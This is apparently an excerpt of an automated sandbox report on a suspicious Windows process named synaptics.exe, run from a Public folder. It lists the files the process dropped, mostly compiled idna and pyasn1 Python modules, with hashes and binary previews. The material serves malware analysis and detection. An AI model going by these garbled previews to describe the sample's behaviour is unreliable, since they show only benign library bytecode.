                                                                                                                                                                                      SSDEEP:12:CSCSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/C+Vlyzx5:pijeXL/whvOcAdtOb8fcjOb897g
                                                                                                                                                                                      MD5:992F897492FD29277FB10EC9B4358526
                                                                                                                                                                                      SHA1:41A00693E4644B3C64FBD1B88381A7170C16CAF2
                                                                                                                                                                                      SHA-256:376CDF3C2ECADAC9358C9C28235C7C154F50378FD229067F5977DD017D534058
                                                                                                                                                                                      SHA-512:2A20F4D89D35303E2248D4435F684E7AEC73A36A86F716798997F949DB2291309831F27E0003FBD38A25D77147B378561202AC9ADC81C4AD1AED55988B26000D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....?C:\Users\Public\QExvbmVOb25l\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9917
                                                                                                                                                                                      Entropy (8bit):5.446833464521934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NePGIILf6b4+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:cPpIF+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                      MD5:63AD381C030C6C1315A83E82BD39A6EA
                                                                                                                                                                                      SHA1:D669D720FE2035444E9C136BE83956A493A1C2DA
                                                                                                                                                                                      SHA-256:AD2032912A8FD88E630E4982D90F4E9A3E5D82ECB0606FA389F99BEEF22501E6
                                                                                                                                                                                      SHA-512:F2EEC130E81CA603C2585CC69F85FC0237F93BCD87B7131BB54BAC3BFBA433BBDFEB69F93101A5121D77A218B493C61C66198D7DD36DAB7985D319DE34E25D62
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):198619
                                                                                                                                                                                      Entropy (8bit):3.520914545089092
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:PIS0p2ZbbO4g3aD8yynBXLD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:P621S458yys
                                                                                                                                                                                      MD5:8A84F839B282549F777EB57750D669D1
                                                                                                                                                                                      SHA1:ACBE9BF8349006D81B40722B126630707A753E53
                                                                                                                                                                                      SHA-256:B29AA4E439910BF86E3017F53A89539A58C82634A967C6F0921C2E698A0C0EA9
                                                                                                                                                                                      SHA-512:1224B35C7E7BA4CC8268E506DC8EF7D667B64FCC367F2085B269E969EA676C8C19FB9A21CDF5ADC9670DFAC3226525A45D878801DE83141D81C2E3E5824910AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1952
                                                                                                                                                                                      Entropy (8bit):5.309293995361254
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:DrDo6itCRy/ORh72cN+Rl/99X7iEvR9Bn:Drc7kR2cNC/9t7jvN
                                                                                                                                                                                      MD5:744C0DC26990A3C0EEE1ECD63613FB60
                                                                                                                                                                                      SHA1:CBF5329BCA22BB910EADC76C6ED058AFC78B55FB
                                                                                                                                                                                      SHA-256:2F48183F56A5C5A0BE8B9402EB6423E910F4BD42C85EC9D6745BA8226749D6BF
                                                                                                                                                                                      SHA-512:B704FCE6B2458878550EFC01209963D737F16FB3AEF6D8453094CA3968B66E75E5616C07592C5879AA9224F143CA60024C942FC41C3BF26CCDECE9928AA9BE30
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                      Entropy (8bit):4.861282357369582
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/BAauletxbkCoeJ/Lt/lPlXaHF50YTlHX0M9VWrzSBw5JOmIOt2TgN:y/rqetGCow53aHxEM9ArmBw5Ampt2s
                                                                                                                                                                                      MD5:C9249CAD98D4B69C0B01BAF12AADB91B
                                                                                                                                                                                      SHA1:57EC9C5ED69FE0C0E06E5C32F95F701EED00DE72
                                                                                                                                                                                      SHA-256:A2FCFE4DF00031E1952B78F20ACD38FD58011922F0C5914287A02EF28D20A45D
                                                                                                                                                                                      SHA-512:019952CF71BA8AEF14E254F97F22D7CAB87B5AEA4FB733EC32124A6AA3E4CAD118EF3D2AAF9118CBA4E6A343C1673ED87F6D01AE2CD9898EBC1FE087A019F3F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                      Entropy (8bit):4.915419392027585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/re7lauletxbkCoJ1tt/lPlmuaHF50YTlHX0M9VWrzL1dM4LkcTgM:y/S78qetGCoJ1rGuaHxEM9Ardnt
                                                                                                                                                                                      MD5:5C3E8841E32AF41E172E94DD3155AC5E
                                                                                                                                                                                      SHA1:EC0A28F64DCD33C1DE34A1C3E998C75AA7611F72
                                                                                                                                                                                      SHA-256:16318E2F44C421B7BA38766D880A4B32CB6ADB5FC7076A87A55302FC26EA86B8
                                                                                                                                                                                      SHA-512:C0DDF6E75B2D7B60DFFCA83C21B410C2CCE42986CD59F3CB8398D73B3BCDBD07FF3F8499F010921D2FD4FA6AB9236B3F08898A4F9EBB07BCEC40ABDBE9F2D0C6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..fB........................@...s....d.Z.d.S.).z.0.6.1N)...__version__..r....r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4123
                                                                                                                                                                                      Entropy (8bit):4.996515302319786
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:if//QELK0E+xQk5QMwJ9v9YitXwqiOEsRuUOGnBiw:ifm0XQ1MwzOOFRTBp
                                                                                                                                                                                      MD5:3DBA8224670CCC04457E0A2B25A8EF1A
                                                                                                                                                                                      SHA1:5AA7A1ACDE99C672ED4A4DED0FC2AC7740C0BBB2
                                                                                                                                                                                      SHA-256:0D3588F04690BCE574A4F78FD7DFFB7DA21EC92DA0E9D648A5CDF4EDDC115131
                                                                                                                                                                                      SHA-512:105A789B93C5EA647D914609F2A4BB561B99D71D325AFD948E2E768126FA74FD593E3C8E9B4E0AA2644B826F9CE6C1B0847239F420D8B3137433F0824BC3F7E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.d...Z.i.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.a.d.d...Z.d.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.S.)......N)...__version__)...error)...Debug..setLogger..hexdump..........i....)...none..encoder..decoder..allc....................@...s&...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.)...PrinterNc....................C...sj...|.d.u.r.t...d...}.|...t.j.....|.d.u.r.t.....}.|.d.u.r t...d...}.|...|.....|...t.j.....|...|.....|.|._.d.S.).N..pyasn1z!%(asctime)s %(name)s: %(message)s)...logging..getLogger..setLevel..DEBUG..StreamHandler..Formatter..setFormatter..addHandler.._Printer__logger)...self..logger..handler..formatter..r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\debug.py..__init__ ...s..........................z.Printer.__init__c....................C........|.j...|.....d.S...N).r......debug..r......msgr....r....r......__call__2..........z.Printer.__call__c......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4092
                                                                                                                                                                                      Entropy (8bit):4.987517156615224
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Qce+V9bNxz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:IqZP9GWKOr+3eId632TjbriH
                                                                                                                                                                                      MD5:8C54B066F7AC0D6E2D30C330E8F566F3
                                                                                                                                                                                      SHA1:94E0598F6E4A35D4AD22D14C71011FED3A93B1EB
                                                                                                                                                                                      SHA-256:D8529D263C9FF48975298D4CB436DD55E5A034FB7D4787BFFA95BEA9F9ECA362
                                                                                                                                                                                      SHA-512:ABAEA21E6FE499342E39E7A33FD67B9509ADD56B52100141DD0C7F38B268DCB09E0758BF8553FC783DDBA4675EFBB394D164D9068E3A3BE51844FFBC50E14559
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers to better u
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                      Entropy (8bit):4.646004548174159
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWeiouWDaHF50YTlHX0M9VWrzL1A67kcTgp:y/SLqeh/wxZDaHxEM9ArdA6x4
                                                                                                                                                                                      MD5:D66824B5940B2919BF22AAF9835EF8E1
                                                                                                                                                                                      SHA1:83039C2051016B395DF9D065AEAF6D898DBA3E76
                                                                                                                                                                                      SHA-256:FD396D8A89D4A474447205C948C1A2C432A8532122B8579E60376824A73BC860
                                                                                                                                                                                      SHA-512:51FDEA39CA3847B572782A1F1978FFA7B4A44DBC636CBE31666EC15CBB4CDD4014A6E20CC58AA749805FB1087A32B05D85E9120CA1B1502AB31BE3D2E71F5C61
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5825
                                                                                                                                                                                      Entropy (8bit):5.2823731361709525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:N+ZlQBEsXLKBLEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:IxrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                      MD5:6EC024F438F1ECC63BA35DEDF0BADF99
                                                                                                                                                                                      SHA1:3F53FA8BAF5B44F90865850DE800F1A226CC2576
                                                                                                                                                                                      SHA-256:0F80FEA6E328EF679A7600C03332D0AE88A7A52297537E0F2C35E1AD342DDB3F
                                                                                                                                                                                      SHA-512:E922DBBFB9A5A517AD13975BFAC72F5C26E8CB5F5E8C2BAC48E202A89ADBE64EAE237B415610BC52C50AD7E23CB18DC047DB425BA712033F50C98866E7FA92D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...sb...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e.j...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......N)...error)...univc....................@...sd...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.e.j.f.d.d...Z.d.d.d...Z.e.d.d.....Z.e.j.d.d.....Z.d.d...Z.d.S.)...CachingStreamWrappera....Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. c....................C...s....|.|._.t.....|._.d.|._.d.S...Nr....)..._raw..io..BytesIO.._cache.._markedPosition)...self..raw..r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\streaming.py..__init__....s..........z.CachingStreamWrapper.__init__c....................C...s$...|...|...}.|.j...t.|.....t.j.....|.S...N)...readr......seek..len..os..SEEK_CUR).r......n..resultr..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):168
                                                                                                                                                                                      Entropy (8bit):4.65218335522788
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWeuk8uaHF50YTlHX0M9VWrzL19AXkcTgp:y/SLqeh/wj8uaHxEM9Ardm4
                                                                                                                                                                                      MD5:23D7B2D4657E949DBFDAAB4F78B5AD9A
                                                                                                                                                                                      SHA1:7442A44507AC9CF625309D26D45E7AF912B07F5F
                                                                                                                                                                                      SHA-256:60569E114083540946FE945B87A2DB469E0E1491D4544FB5F14D5DFEBCB3FA18
                                                                                                                                                                                      SHA-512:ED96A95817404C76DE3219F97BCE8643FF81523421C558A635EF3BDDD1C3FFA45725F660D9B3E78B7B45321AE4512099CBCF849E2B0EE2B2C444AC7086E7C11D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\ber\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42166
                                                                                                                                                                                      Entropy (8bit):5.649115044518659
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:nWU8A/SzSYCTAE7rMi7Oj7KRXjT0DZESJDv/yY7cwel7+gkVy0/lpPUno7wwzY:nWRAqzSSEciqj7KRXjs7f+7MpKt
                                                                                                                                                                                      MD5:EBFFCAA20C21A7C860CABAD2F2C9CB3F
                                                                                                                                                                                      SHA1:F71C4A2F80C467EEF7D261854C11C9B09D914934
                                                                                                                                                                                      SHA-256:C8DDDDCBE5CE1DA5D06D02CB73C23E3F31FC745D4CE602C1AF63555F6DE67872
                                                                                                                                                                                      SHA-512:698E89AA70732FC23001FD7AE66AD0A62456845C18E415F443265E03AA1B04CF3795D55F5027F3257492CC8EAD486D08F965B8EAD3B93AA639A37A08532772F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..fX5.......................@...sT...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.e.e.j.d...Z.e.j.Z.e.j.Z.G.d.d...d.e ..Z!G.d.d...d.e!..Z"G.d.d...d.e"..Z#e#..Z$G.d.d...d.e"..Z%G.d.d...d.e%..Z&G.d.d...d.e"..Z'G.d.d ..d e"..Z(G.d!d"..d"e"..Z)G.d#d$..d$e"..Z*G.d%d&..d&e"..Z+G.d'd(..d(e"..Z,G.d)d*..d*e!..Z-G.d+d,..d,e-..Z.G.d-d...d.e...Z/G.d/d0..d0e/..Z0G.d1d2..d2e/..Z1G.d3d4..d4e...Z2G.d5d6..d6e2..Z3G.d7d8..d8e2..Z4G.d9d:..d:e...Z5G.d;d<..d<e"..Z6G.d=d>..d>e(..Z7G.d?d@..d@e(..Z8G.dAdB..dBe(..Z9G.dCdD..dDe(..Z:G.dEdF..dFe(..Z;G.dGdH..dHe(..Z<G.dIdJ..dJe(..Z=G.dKdL..dLe(..Z>G.dMdN..dNe(..Z?G.dOdP..dPe(..Z@G.dQdR..dRe(..ZAG.dSdT..dTe(..ZBG.dUdV..dVe(..ZCG.dWdX..dXe(..ZDi.e.jEjFe%....e.jGjFe&....e.jHjFe'....e.jIjFe(....e.jJjFe)....e.jKjFe*....e.jLjFe+....e.jMjFe%....e.jNjFe,....e.jOjFe/....e.jPjFe2....e.jQjF
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):779
                                                                                                                                                                                      Entropy (8bit):5.1207754278285575
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:ZMN0EngkvZJW64GBJoszRD3QWqSoFB6GU:ZinVQ63oPw
                                                                                                                                                                                      MD5:C92A5F4D5AF8BEBAA3CF079A08C9AF50
                                                                                                                                                                                      SHA1:3037A859271FFE4FC3E25EB10C58443BD46EC431
                                                                                                                                                                                      SHA-256:249C13C8C8721E8C8AA18E8958198A2CA60B291853D54B9415CCB83C87607076
                                                                                                                                                                                      SHA-512:9DF63E12222365BFDAD40C0097B44B58F6675A0AA3D7334CA58A775EEDA96E1F1FF8B0ECDDA8363449E100C0F3C387FC8AA5F186BE81015829C72BBEC2B7D18F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s:...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d.e.j...Z.e...Z.d.S.)......)...base)...tag..endOfOctetsc....................@...s4...e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.d.Z.d.d...Z.d.S.)...EndOfOctetsr....Nc....................O...s*...|.j.d.u.r.t.j.|.g.|...R.i.|.....|._.|.j.S.).N)..._instance..object..__new__)...cls..args..kwargs..r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\ber\eoo.pyr........s..........z.EndOfOctets.__new__)...__name__..__module__..__qualname__Z.defaultValuer......initTagSet..Tag..tagClassUniversal..tagFormatSimple..tagSetr....r....r....r....r....r....r........s..................r....N)...pyasn1.typer....r......__all__..SimpleAsn1Typer....r....r....r....r....r......<module>....s..............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):168
                                                                                                                                                                                      Entropy (8bit):4.65218335522788
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWeuk8uaHF50YTlHX0M9VWrzL18ygOkcTgp:y/SLqeh/wj8uaHxEM9Ard8Nu4
                                                                                                                                                                                      MD5:A99AF90C0644700CE6923403F8AB3984
                                                                                                                                                                                      SHA1:32DA07E3FC76B8D7950913D9FFE2B8213DEE45EF
                                                                                                                                                                                      SHA-256:F24BE1E563FCDCB1392135A361A9EA6B7DA18729B3FCE140BBBACBDDC08E4A9F
                                                                                                                                                                                      SHA-512:3630EACF5868AC2933D18649D7D532F47BA98EE7A15F581BF3F7E47B8FE6E568D84DC6550F07029EFEE7A7121CD7B857F9806A40B0A8155486519DFFCEF4384F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\cer\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2499
                                                                                                                                                                                      Entropy (8bit):5.405801206407453
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:wz8iXwFKzH/u19DflQ6ezclOVaJORi6Zy0punszpDVYRB:wz5XTfcf9EaJONNpunszp5K
                                                                                                                                                                                      MD5:57A97917915DF3DBD5EB1DAF5829E01C
                                                                                                                                                                                      SHA1:A05B9E4BBB0EA76CEF047C8E4B21CD5E14C4514E
                                                                                                                                                                                      SHA-256:E83F5DE3A3F78A262289B5A2E56D33992B34A67D05E45BCD8DA78632492B0C1F
                                                                                                                                                                                      SHA-512:D392AA31C4AA51C8759D2FC20FF73A2F7BB4CE9DF507DB8DA04D5A02D6DD2C79D5163AC61A9376B92C4DA8F17075C9D07F96331CF8D1B7EF1CE09387D7850D44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s8...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rte.j.j.j.Z.e.d.u.rte.e.v.rte.e.e.<.q\G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j ..Z e ..Z!d.e"f.d.d...Z#d.S.)......N)...error)...readFromStream)...decoder)...univ..decode..StreamingDecoderc....................@...s$...e.Z.d.Z.e...d...Z.....d.d.d...Z.d.S.)...BooleanPayloadDecoderr....Nc....................k...s......|.d.k.r.t...d.....t.|.|.|...D.].}.t.|.t...r.|.V...q.|.d...}.|.d.k.r&d.}.n.|.d.k.r-d.}.n.t...d.|.......|.j.|.|.|.f.i.|.....V...d.S.).N.....z Not single-octet Boolean payloadr.........z.Unexpected Boolean payload: %s).r....Z.PyAsn1Errorr......isinstance..SubstrateUnderrunErrorZ._createComponent)...selfZ.substrateZ.asn1Spec..tagSet..length..stateZ.decodeFunZ.substrateFun..options..chunk..byte..value..r.....JC:\Users\Public\QExvbmVOb
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):168
                                                                                                                                                                                      Entropy (8bit):4.654353164612405
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWeuk8uaHF50YTlHX0M9VWrzL17BOkcTgp:y/SLqeh/wj8uaHxEM9Ard04
                                                                                                                                                                                      MD5:B6C31C5C9B42096379B8817E8AD5D0ED
                                                                                                                                                                                      SHA1:5463F96D890AB86E73696210B6FC6C68C2418F85
                                                                                                                                                                                      SHA-256:BA14878859BF34D0DB35E06992304881A898999B99FB17A59849093327DDAC7C
                                                                                                                                                                                      SHA-512:88B7D5A4580C94455187882F772D346FCB2F5D557CDADC8E866CF37B5DD7D81FC6AB5F9ED895FE77ACB779903BC74ED1FADB9A3AA1A38BA28712838F988DCA3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\der\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
